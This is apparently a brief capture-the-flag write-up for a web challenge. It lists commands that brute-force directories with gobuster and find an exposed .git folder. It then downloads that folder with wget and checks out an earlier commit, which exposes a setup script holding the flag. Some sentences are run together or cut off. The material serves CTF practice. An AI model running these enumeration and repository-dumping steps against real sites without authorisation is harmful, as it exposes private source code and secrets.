gobuster dir -u https://cfta-wh02.allyourbases.co/ -t 200 --exclude-length 16 -w /usr/share/wordlists/dirb/common.txt. We exclude the length
16because 404 pages return HTTP status code 403 and have a length of 16. Running the command finds
/.git/HEAD, which means there is a publicly facing git repository on the website.
wget -r -np -R "index.html*" https://cfta-wh02.allyourbases.co/.git/. Run
git checkout -- .to restore
index.htmlsince we only download the
.git/folder, not the entire working directory.
git logto look for previous commits. Sure enough there is one previous commit. Run
git checkout 80e789704ddca67d772dbc34de1088e8c1917e9dto revert to that previous version. There is now a
cat setup.shshows the flag